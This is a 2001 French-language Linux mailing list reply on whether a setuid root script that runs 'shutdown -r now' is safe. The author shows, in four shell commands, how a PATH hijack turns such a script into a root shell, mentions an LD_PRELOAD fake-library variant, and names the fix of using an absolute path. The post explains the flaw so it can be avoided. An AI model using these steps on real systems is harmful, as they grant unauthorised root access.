[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [linux] Autoriser le reboot a l'usager lambda



At 10:46 23/03/2001 +0100, you wrote:
>  Ca ne represente pas un emmental de securite ?

> Si, en effet.

Je ne suis pas un expert en securite, mais si qqn peut m'expliquer
comment detourner un script setuid root, ou il y aurait juste
"shutdown -r now" ca m'interese.
Y'a qu'à demander. Supposant que ton script s'appelle usershut.sh
$ export PATH=.:$PATH
$ cp /bin/sh shutdown
$ chmod 0777 shutdown
$ usershut.sh
# ...

Bon, je suis pas sûr que bash se laisse faire ainsi mais un petit prg C fera parfaitement l'affaire.

Bien sûr, la parade consiste à forcer le path de shutdown mais tu vois qu'on peut facilement oublier un truc.

Tu veux un autre exemple ?
Les variables LD_ contrôlent les chemins vers les librairies partagées. Tu crées une libc bidon, tu la mets en preload et tu lances le script et shbunk.

Eric.



[ Soyez précis dans vos sujets svp afin de déterminer directement ]
[ le type de demande... ]
[ Pour vous (dés)inscrire, aller sur http://linuxbe.org/ml.php ]
[ http://LinuxBe.org Contact: listmaster@linuxbe.org ]